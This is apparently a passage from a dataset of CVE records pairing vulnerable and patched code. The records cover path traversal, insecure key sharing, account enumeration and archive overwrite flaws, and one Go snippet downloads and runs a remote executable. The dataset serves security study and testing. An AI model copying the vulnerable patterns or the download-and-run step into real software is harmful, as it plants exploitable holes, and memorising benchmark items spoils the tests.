This vulnerability allows reading parts of format-compliant files, including code and log files, which may contain highly sensitive information such as account credentials.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gaizhenbiao/chuanhuchatgpt", "patch_url": ["https://github.com/gaizhenbiao/chuanhuchatgpt/commit/2836fd1db3efcd5ede63c0e7fbbdf677730dbb51"], "programing_language": "Python", "vul_func": [{"id": "vul_py_369_1", "commit": "c2c2b86d14e28d3b106f067ebb9b44f8acfbff1e", "file_path": "modules/utils.py", "start_line": 520, "end_line": 540, "snippet": "def load_template(filename, mode=0):\n logging.debug(f\"\\u52a0\\u8f7d\\u6a21\\u677f\\u6587\\u4ef6{filename}\\uff0c\\u6a21\\u5f0f\\u4e3a{mode}\\uff080\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\u548c\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c1\\u4e3a\\u8fd4\\u56de\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c2\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\uff09\")\n lines = []\n if filename.endswith(\".json\"):\n with open(os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\") as f:\n lines = json.load(f)\n lines = [[i[\"act\"], i[\"prompt\"]] for i in lines]\n else:\n with open(\n os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\"\n ) as csvfile:\n reader = csv.reader(csvfile)\n lines = list(reader)\n lines = lines[1:]\n if mode == 1:\n return sorted_by_pinyin([row[0] for row in lines])\n elif mode == 2:\n return {row[0]: row[1] for row in lines}\n else:\n choices = sorted_by_pinyin([row[0] for row in lines])\n return {row[0]: row[1] for row in lines}, gr.Dropdown(choices=choices)"}], "fix_func": [{"id": "fix_py_369_1", "commit": "2836fd1db3efcd5ede63c0e7fbbdf677730dbb51", "file_path": "modules/utils.py", "start_line": 520, "end_line": 544, "snippet": "def load_template(filename, mode=0):\n logging.debug(f\"\\u52a0\\u8f7d\\u6a21\\u677f\\u6587\\u4ef6{filename}\\uff0c\\u6a21\\u5f0f\\u4e3a{mode}\\uff080\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\u548c\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c1\\u4e3a\\u8fd4\\u56de\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c2\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\uff09\")\n lines = []\n template_file_path = os.path.join(TEMPLATES_DIR, filename)\n # check if template_file_path is inside TEMPLATES_DIR\n if not os.path.realpath(template_file_path).startswith(os.path.realpath(TEMPLATES_DIR)):\n return \"Invalid template file path\"\n if filename.endswith(\".json\"):\n with open(template_file_path, \"r\", encoding=\"utf8\") as f:\n lines = json.load(f)\n lines = [[i[\"act\"], i[\"prompt\"]] for i in lines]\n else:\n with open(\n template_file_path, \"r\", encoding=\"utf8\"\n ) as csvfile:\n reader = csv.reader(csvfile)\n lines = list(reader)\n lines = lines[1:]\n if mode == 1:\n return sorted_by_pinyin([row[0] for row in lines])\n elif mode == 2:\n return {row[0]: row[1] for row in lines}\n else:\n choices = sorted_by_pinyin([row[0] for row in lines])\n return {row[0]: row[1] for row in lines}, gr.Dropdown(choices=choices)"}], "vul_patch": "--- a/modules/utils.py\n+++ b/modules/utils.py\n@@ -1,13 +1,17 @@\n def load_template(filename, mode=0):\n 
logging.debug(f\"\\u52a0\\u8f7d\\u6a21\\u677f\\u6587\\u4ef6{filename}\\uff0c\\u6a21\\u5f0f\\u4e3a{mode}\\uff080\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\u548c\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c1\\u4e3a\\u8fd4\\u56de\\u4e0b\\u62c9\\u83dc\\u5355\\uff0c2\\u4e3a\\u8fd4\\u56de\\u5b57\\u5178\\uff09\")\n lines = []\n+ template_file_path = os.path.join(TEMPLATES_DIR, filename)\n+ # check if template_file_path is inside TEMPLATES_DIR\n+ if not os.path.realpath(template_file_path).startswith(os.path.realpath(TEMPLATES_DIR)):\n+ return \"Invalid template file path\"\n if filename.endswith(\".json\"):\n- with open(os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\") as f:\n+ with open(template_file_path, \"r\", encoding=\"utf8\") as f:\n lines = json.load(f)\n lines = [[i[\"act\"], i[\"prompt\"]] for i in lines]\n else:\n with open(\n- os.path.join(TEMPLATES_DIR, filename), \"r\", encoding=\"utf8\"\n+ template_file_path, \"r\", encoding=\"utf8\"\n ) as csvfile:\n reader = csv.reader(csvfile)\n lines = list(reader)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-47080", "cve_description": "matrix-js-sdk is the Matrix Client-Server SDK for JavaScript and TypeScript. In matrix-js-sdk versions 9.11.0 through 34.7.0, the method `MatrixClient.sendSharedHistoryKeys` is vulnerable to interception by malicious homeservers. The method was introduced by MSC3061 and is commonly used to share historical message keys with newly invited users, granting them access to past messages in the room. However, it unconditionally sends these \"shared\" keys to all of the invited user's devices, regardless of whether the user's cryptographic identity is verified or whether the user's devices are signed by that identity. This allows an attacker to inject their own devices to receive sensitive historical keys without proper security checks. Note that this only affects clients running the SDK with the legacy crypto stack. Clients using the new Rust cryptography stack (i.e. those that call `MatrixClient.initRustCrypto()` instead of `MatrixClient.initCrypto()`) are unaffected by this vulnerability, because `MatrixClient.sendSharedHistoryKeys()` raises an exception in such environments. The vulnerability was fixed in matrix-js-sdk 34.8.0 by removing the vulnerable functionality. 
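The chuanhuchatgpt fix above (CVE-2024-7962) joins the user-supplied filename to TEMPLATES_DIR and rejects the result unless its realpath stays under the templates directory. One caveat with a plain startswith() prefix test is that a sibling directory such as "templates_evil" would also pass; a slightly stricter sketch (a hypothetical helper, not the project's code) pins the boundary with commonpath():

    import os

    def safe_template_path(templates_dir: str, filename: str) -> str:
        base = os.path.realpath(templates_dir)
        candidate = os.path.realpath(os.path.join(base, filename))
        # commonpath() only equals base when candidate is base or below it,
        # so "../" traversal, absolute filenames, and look-alike siblings
        # such as "templates_evil" are all rejected.
        if os.path.commonpath([base, candidate]) != base:
            raise ValueError("illegal template path: %r" % filename)
        return candidate
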
As a workaround, remove use of affected functionality from clients.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/matrix-org/matrix-js-sdk", "patch_url": ["https://github.com/matrix-org/matrix-js-sdk/commit/2fb1e659c81f75253c047832dc9dcc2beddfac5f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_205_1", "commit": "868bbfc", "file_path": "spec/unit/models/MSC3089TreeSpace.spec.ts", "start_line": 31, "end_line": 212, "snippet": "describe(\"MSC3089TreeSpace\", () => {\n let client: MatrixClient;\n let room: any;\n let tree: MSC3089TreeSpace;\n const roomId = \"!tree:localhost\";\n const targetUser = \"@target:example.org\";\n\n let powerLevels: MatrixEvent;\n\n beforeEach(() => {\n // TODO: Use utility functions to create test rooms and clients\n client = {\n getRoom: (fetchRoomId: string) => {\n if (fetchRoomId === roomId) {\n return room;\n } else {\n throw new Error(\"Unexpected fetch for unknown room\");\n }\n },\n };\n room = {\n currentState: {\n getStateEvents: (evType: EventType, stateKey: string) => {\n if (evType === EventType.RoomPowerLevels && stateKey === \"\") {\n return powerLevels;\n } else {\n throw new Error(\"Accessed unexpected state event type or key\");\n }\n },\n },\n };\n tree = new MSC3089TreeSpace(client, roomId);\n makePowerLevels(DEFAULT_TREE_POWER_LEVELS_TEMPLATE);\n });\n\n function makePowerLevels(content: any) {\n powerLevels = new MatrixEvent({\n type: EventType.RoomPowerLevels,\n state_key: \"\",\n sender: \"@creator:localhost\",\n event_id: \"$powerlevels\",\n room_id: roomId,\n content: content,\n });\n }\n\n it(\"should populate the room reference\", () => {\n expect(tree.room).toBe(room);\n });\n\n it(\"should proxy the ID member to room ID\", () => {\n expect(tree.id).toEqual(tree.roomId);\n expect(tree.id).toEqual(roomId);\n });\n\n it(\"should support setting the name of the space\", async () => {\n const newName = \"NEW NAME\";\n const fn = jest\n .fn()\n .mockImplementation((stateRoomId: string, eventType: EventType, content: any, stateKey: string) => {\n expect(stateRoomId).toEqual(roomId);\n expect(eventType).toEqual(EventType.RoomName);\n expect(stateKey).toEqual(\"\");\n expect(content).toMatchObject({ name: newName });\n return Promise.resolve();\n });\n client.sendStateEvent = fn;\n await tree.setName(newName);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should support inviting users to the space\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false, false);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should retry invites to the space\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n if (fn.mock.calls.length === 1) return Promise.reject(new Error(\"Sample Failure\"));\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false, false);\n expect(fn).toHaveBeenCalledTimes(2);\n });\n\n it(\"should not retry invite permission errors\", async () => {\n const target = targetUser;\n const fn = 
jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.reject(new MatrixError({ errcode: \"M_FORBIDDEN\", error: \"Sample Failure\" }));\n });\n client.invite = fn;\n\n await expect(tree.invite(target, false, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should invite to subspaces\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n tree.getDirectories = () => [\n // Bare minimum overrides. We proxy to our mock function manually so we can\n // count the calls, not to ensure accuracy. The invite function behaving correctly\n // is covered by another test.\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n ];\n\n await tree.invite(target, true, false);\n expect(fn).toHaveBeenCalledTimes(4);\n });\n\n it(\"should share keys with invitees\", async () => {\n const target = targetUser;\n const sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userIds).toMatchObject([target]);\n return Promise.resolve();\n });\n client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n client.sendSharedHistoryKeys = sendKeysFn;\n\n // Mock the history check as best as possible\n const historyVis = \"shared\";\n const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n // We're not expecting a super rigid test: the function that calls this internally isn't\n // really being tested here.\n expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n expect(stateKey).toEqual(\"\");\n return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n });\n room.currentState.getStateEvents = historyFn;\n\n // Note: inverse test is implicit from other tests, which disable the call stack of this\n // test in order to pass.\n await tree.invite(target, false, true);\n expect(sendKeysFn).toHaveBeenCalledTimes(1);\n expect(historyFn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should not share keys with invitees if inappropriate history visibility\", async () => {\n const target = targetUser;\n const sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userIds).toMatchObject([target]);\n return Promise.resolve();\n });\n client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n client.sendSharedHistoryKeys = sendKeysFn;\n\n const historyVis = \"joined\"; // NOTE: Changed.\n const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n expect(stateKey).toEqual(\"\");\n return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n });\n room.currentState.getStateEvents = historyFn;\n\n await tree.invite(target, false, true);\n expect(sendKeysFn).toHaveBeenCalledTimes(0);\n expect(historyFn).toHaveBeenCalledTimes(1);\n });\n"}, {"id": 
"vul_js_205_2", "commit": "868bbfc", "file_path": "src/models/MSC3089TreeSpace.ts", "start_line": 146, "end_line": 161, "snippet": " public async invite(userId: string, andSubspaces = true, shareHistoryKeys = true): Promise {\n const promises: Promise[] = [this.retryInvite(userId)];\n if (andSubspaces) {\n promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces, shareHistoryKeys)));\n }\n return Promise.all(promises).then(() => {\n // Note: key sharing is default on because for file trees it is relatively important that the invite\n // target can actually decrypt the files. The implied use case is that by inviting a user to the tree\n // it means the sender would like the receiver to view/download the files contained within, much like\n // sharing a folder in other circles.\n if (shareHistoryKeys && isRoomSharedHistory(this.room)) {\n // noinspection JSIgnoredPromiseFromCall - we aren't concerned as much if this fails.\n this.client.sendSharedHistoryKeys(this.roomId, [userId]);\n }\n });\n }"}], "fix_func": [{"id": "fix_js_205_1", "commit": "2fb1e65", "file_path": "spec/unit/models/MSC3089TreeSpace.spec.ts", "start_line": 31, "end_line": 161, "snippet": "describe(\"MSC3089TreeSpace\", () => {\n let client: MatrixClient;\n let room: any;\n let tree: MSC3089TreeSpace;\n const roomId = \"!tree:localhost\";\n const targetUser = \"@target:example.org\";\n\n let powerLevels: MatrixEvent;\n\n beforeEach(() => {\n // TODO: Use utility functions to create test rooms and clients\n client = {\n getRoom: (fetchRoomId: string) => {\n if (fetchRoomId === roomId) {\n return room;\n } else {\n throw new Error(\"Unexpected fetch for unknown room\");\n }\n },\n };\n room = {\n currentState: {\n getStateEvents: (evType: EventType, stateKey: string) => {\n if (evType === EventType.RoomPowerLevels && stateKey === \"\") {\n return powerLevels;\n } else {\n throw new Error(\"Accessed unexpected state event type or key\");\n }\n },\n },\n };\n tree = new MSC3089TreeSpace(client, roomId);\n makePowerLevels(DEFAULT_TREE_POWER_LEVELS_TEMPLATE);\n });\n\n function makePowerLevels(content: any) {\n powerLevels = new MatrixEvent({\n type: EventType.RoomPowerLevels,\n state_key: \"\",\n sender: \"@creator:localhost\",\n event_id: \"$powerlevels\",\n room_id: roomId,\n content: content,\n });\n }\n\n it(\"should populate the room reference\", () => {\n expect(tree.room).toBe(room);\n });\n\n it(\"should proxy the ID member to room ID\", () => {\n expect(tree.id).toEqual(tree.roomId);\n expect(tree.id).toEqual(roomId);\n });\n\n it(\"should support setting the name of the space\", async () => {\n const newName = \"NEW NAME\";\n const fn = jest\n .fn()\n .mockImplementation((stateRoomId: string, eventType: EventType, content: any, stateKey: string) => {\n expect(stateRoomId).toEqual(roomId);\n expect(eventType).toEqual(EventType.RoomName);\n expect(stateKey).toEqual(\"\");\n expect(content).toMatchObject({ name: newName });\n return Promise.resolve();\n });\n client.sendStateEvent = fn;\n await tree.setName(newName);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should support inviting users to the space\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should retry invites to the space\", async 
() => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n if (fn.mock.calls.length === 1) return Promise.reject(new Error(\"Sample Failure\"));\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(2);\n });\n\n it(\"should not retry invite permission errors\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.reject(new MatrixError({ errcode: \"M_FORBIDDEN\", error: \"Sample Failure\" }));\n });\n client.invite = fn;\n\n await expect(tree.invite(target, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should invite to subspaces\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n tree.getDirectories = () => [\n // Bare minimum overrides. We proxy to our mock function manually so we can\n // count the calls, not to ensure accuracy. The invite function behaving correctly\n // is covered by another test.\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n ];\n\n await tree.invite(target, true);\n expect(fn).toHaveBeenCalledTimes(4);\n });\n"}, {"id": "fix_js_205_2", "commit": "2fb1e65", "file_path": "src/models/MSC3089TreeSpace.ts", "start_line": 140, "end_line": 146, "snippet": " public async invite(userId: string, andSubspaces = true): Promise {\n const promises: Promise[] = [this.retryInvite(userId)];\n if (andSubspaces) {\n promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces)));\n }\n await Promise.all(promises);\n }"}], "vul_patch": "--- a/spec/unit/models/MSC3089TreeSpace.spec.ts\n+++ b/spec/unit/models/MSC3089TreeSpace.spec.ts\n@@ -77,7 +77,7 @@\n return Promise.resolve();\n });\n client.invite = fn;\n- await tree.invite(target, false, false);\n+ await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n \n@@ -90,7 +90,7 @@\n return Promise.resolve();\n });\n client.invite = fn;\n- await tree.invite(target, false, false);\n+ await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(2);\n });\n \n@@ -103,7 +103,7 @@\n });\n client.invite = fn;\n \n- await expect(tree.invite(target, false, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n+ await expect(tree.invite(target, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n \n expect(fn).toHaveBeenCalledTimes(1);\n });\n@@ -125,57 +125,6 @@\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n ];\n \n- await tree.invite(target, true, false);\n+ await tree.invite(target, true);\n expect(fn).toHaveBeenCalledTimes(4);\n });\n-\n- it(\"should share keys with invitees\", async () => {\n- const target = targetUser;\n- const sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n- expect(inviteRoomId).toEqual(roomId);\n- expect(userIds).toMatchObject([target]);\n- return Promise.resolve();\n- });\n- 
client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n- client.sendSharedHistoryKeys = sendKeysFn;\n-\n- // Mock the history check as best as possible\n- const historyVis = \"shared\";\n- const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n- // We're not expecting a super rigid test: the function that calls this internally isn't\n- // really being tested here.\n- expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n- expect(stateKey).toEqual(\"\");\n- return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n- });\n- room.currentState.getStateEvents = historyFn;\n-\n- // Note: inverse test is implicit from other tests, which disable the call stack of this\n- // test in order to pass.\n- await tree.invite(target, false, true);\n- expect(sendKeysFn).toHaveBeenCalledTimes(1);\n- expect(historyFn).toHaveBeenCalledTimes(1);\n- });\n-\n- it(\"should not share keys with invitees if inappropriate history visibility\", async () => {\n- const target = targetUser;\n- const sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n- expect(inviteRoomId).toEqual(roomId);\n- expect(userIds).toMatchObject([target]);\n- return Promise.resolve();\n- });\n- client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n- client.sendSharedHistoryKeys = sendKeysFn;\n-\n- const historyVis = \"joined\"; // NOTE: Changed.\n- const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n- expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n- expect(stateKey).toEqual(\"\");\n- return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n- });\n- room.currentState.getStateEvents = historyFn;\n-\n- await tree.invite(target, false, true);\n- expect(sendKeysFn).toHaveBeenCalledTimes(0);\n- expect(historyFn).toHaveBeenCalledTimes(1);\n- });\n\n--- a/src/models/MSC3089TreeSpace.ts\n+++ b/src/models/MSC3089TreeSpace.ts\n@@ -1,16 +1,7 @@\n- public async invite(userId: string, andSubspaces = true, shareHistoryKeys = true): Promise {\n+ public async invite(userId: string, andSubspaces = true): Promise {\n const promises: Promise[] = [this.retryInvite(userId)];\n if (andSubspaces) {\n- promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces, shareHistoryKeys)));\n+ promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces)));\n }\n- return Promise.all(promises).then(() => {\n- // Note: key sharing is default on because for file trees it is relatively important that the invite\n- // target can actually decrypt the files. 
The implied use case is that by inviting a user to the tree\n- // it means the sender would like the receiver to view/download the files contained within, much like\n- // sharing a folder in other circles.\n- if (shareHistoryKeys && isRoomSharedHistory(this.room)) {\n- // noinspection JSIgnoredPromiseFromCall - we aren't concerned as much if this fails.\n- this.client.sendSharedHistoryKeys(this.roomId, [userId]);\n- }\n- });\n+ await Promise.all(promises);\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-5537", "cve_description": "The password reset form in Weblate before 2.10.1 provides different error messages depending on whether the email address is associated with an account, which allows remote attackers to enumerate user accounts via a series of requests.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/WeblateOrg/weblate", "patch_url": ["https://github.com/WeblateOrg/weblate/commit/abe0d2a29a1d8e896bfe829c8461bf8b391f1079"], "programing_language": "Python", "vul_func": [{"id": "vul_py_345_1", "commit": "e95eacf59f781d8a993be8a23b58e27afdacd9c7", "file_path": "weblate/accounts/views.py", "start_line": 554, "end_line": 585, "snippet": "def reset_password(request):\n '''\n Password reset handling.\n '''\n if 'email' not in load_backends(BACKENDS).keys():\n messages.error(\n request,\n _('Can not reset password, email authentication is disabled!')\n )\n return redirect('login')\n\n if request.method == 'POST':\n form = ResetForm(request.POST)\n if form.is_valid():\n # Force creating new session\n request.session.create()\n if request.user.is_authenticated():\n logout(request)\n\n request.session['password_reset'] = True\n return complete(request, 'email')\n else:\n form = ResetForm()\n\n return render(\n request,\n 'accounts/reset.html',\n {\n 'title': _('Password reset'),\n 'form': form,\n }\n )"}], "fix_func": [{"id": "fix_py_345_1", "commit": "abe0d2a29a1d8e896bfe829c8461bf8b391f1079", "file_path": "weblate/accounts/views.py", "start_line": 554, "end_line": 587, "snippet": "def reset_password(request):\n '''\n Password reset handling.\n '''\n if 'email' not in load_backends(BACKENDS).keys():\n messages.error(\n request,\n _('Can not reset password, email authentication is disabled!')\n )\n return redirect('login')\n\n if request.method == 'POST':\n form = ResetForm(request.POST)\n if form.is_valid():\n # Force creating new session\n request.session.create()\n if request.user.is_authenticated():\n logout(request)\n\n request.session['password_reset'] = True\n return complete(request, 'email')\n else:\n return redirect('email-sent')\n else:\n form = ResetForm()\n\n return render(\n request,\n 'accounts/reset.html',\n {\n 'title': _('Password reset'),\n 'form': form,\n }\n )"}], "vul_patch": "--- a/weblate/accounts/views.py\n+++ b/weblate/accounts/views.py\n@@ -19,6 +19,8 @@\n \n request.session['password_reset'] = True\n return complete(request, 'email')\n+ else:\n+ return redirect('email-sent')\n else:\n form = ResetForm()\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-20835", "cve_description": "A vulnerability was found in tar-fs before 1.16.2. 
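The Weblate fix above (CVE-2017-5537) makes the password-reset form answer identically whether or not the address has an account, redirecting both branches to the same 'email-sent' page. A framework-free sketch of that enumeration-safe shape, with hypothetical helper names:

    def handle_reset_request(email: str, known_accounts: set) -> str:
        if email in known_accounts:
            send_reset_mail(email)  # hypothetical mailer stand-in
        # Identical outcome for both branches: the response no longer says
        # whether the address maps to an account.
        return "email-sent"

    def send_reset_mail(email: str) -> None:
        print("reset link sent to", email)
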
An Arbitrary File Overwrite issue exists when extracting a tarball containing a hardlink to a file that already exists on the system, in conjunction with a later plain file with the same name as the hardlink. This plain file content replaces the existing file content.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/mafintosh/tar-fs", "patch_url": ["https://github.com/mafintosh/tar-fs/commit/06672828e6fa29ac8551b1b6f36c852a9a3c58a2"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_199_1", "commit": "7b4ab17", "file_path": "index.js", "start_line": 261, "end_line": 275, "snippet": " var onlink = function () {\n if (win32) return next() // skip links on win for now before it can be tested\n xfs.unlink(name, function () {\n var srcpath = path.resolve(cwd, header.linkname)\n\n xfs.link(srcpath, name, function (err) {\n if (err && err.code === 'EPERM' && opts.hardlinkAsFilesFallback) {\n stream = xfs.createReadStream(srcpath)\n return onfile()\n }\n\n stat(err)\n })\n })\n }"}], "fix_func": [{"id": "fix_js_199_1", "commit": "0667282", "file_path": "index.js", "start_line": 261, "end_line": 275, "snippet": " var onlink = function () {\n if (win32) return next() // skip links on win for now before it can be tested\n xfs.unlink(name, function () {\n var srcpath = path.join(cwd, path.join('/', header.linkname))\n\n xfs.link(srcpath, name, function (err) {\n if (err && err.code === 'EPERM' && opts.hardlinkAsFilesFallback) {\n stream = xfs.createReadStream(srcpath)\n return onfile()\n }\n\n stat(err)\n })\n })\n }"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,7 +1,7 @@\n var onlink = function () {\n if (win32) return next() // skip links on win for now before it can be tested\n xfs.unlink(name, function () {\n- var srcpath = path.resolve(cwd, header.linkname)\n+ var srcpath = path.join(cwd, path.join('/', header.linkname))\n \n xfs.link(srcpath, name, function (err) {\n if (err && err.code === 'EPERM' && opts.hardlinkAsFilesFallback) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-36561", "cve_description": "Due to improper path sanitization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/yi-ge/unzip", "patch_url": ["https://github.com/yi-ge/unzip/commit/2adbaa4891b9690853ef10216189189f5ad7dc73"], "programing_language": "Go", "vul_func": [{"id": "vul_go_205_1", "commit": "cc5a75e", "file_path": "unzip.go", "start_line": 68, "end_line": 163, "snippet": "func (uz Unzip) Extract() error {\n\tif runtime.GOOS == \"windows\" && GetOsVersion() < 6.1 
{\n\t\tif !FileIsExist(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\"))) {\n\t\t\tdownloadURL := \"https://y-bi.top/unzip.exe\"\n\t\t\tresp, err := ReadRemote(downloadURL, \"\", netClient)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tif len(resp) != 0 {\n\t\t\t\t// empty response means no such file exists, we should do nothing.\n\t\t\t\tf, err := os.OpenFile(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0755)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tf.Write(resp)\n\t\t\t\tf.Close()\n\t\t\t} else {\n\t\t\t\treturn errors.New(\"Install unzip.exe error\")\n\t\t\t}\n\t\t}\n\n\t\tvar cmd *exec.Cmd\n\t\t// dest := uz.Dest //+\"\\\"\"\n\t\tcmd = exec.Command(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), uz.Src, \"-d\", uz.Dest)\n\t\tcmd.Env = os.Environ()\n\t\t_, err := cmd.Output()\n\t\treturn err\n\t}\n\n\tr, err := zip.OpenReader(uz.Src)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\tif err := r.Close(); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}()\n\n\tos.MkdirAll(uz.Dest, 0755)\n\n\t// Closure to address file descriptors issue with all the deferred .Close() methods\n\textractAndWriteFile := func(f *zip.File) error {\n\t\trc, err := f.Open()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := rc.Close(); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t}()\n\n\t\tpath := filepath.Join(uz.Dest, f.Name)\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, f.Mode())\n\t\t} else {\n\t\t\tmode := f.FileHeader.Mode()\n\t\t\tif mode&os.ModeType == os.ModeSymlink {\n\t\t\t\tdata, err := ioutil.ReadAll(rc)\n\t\t\t\tif err != 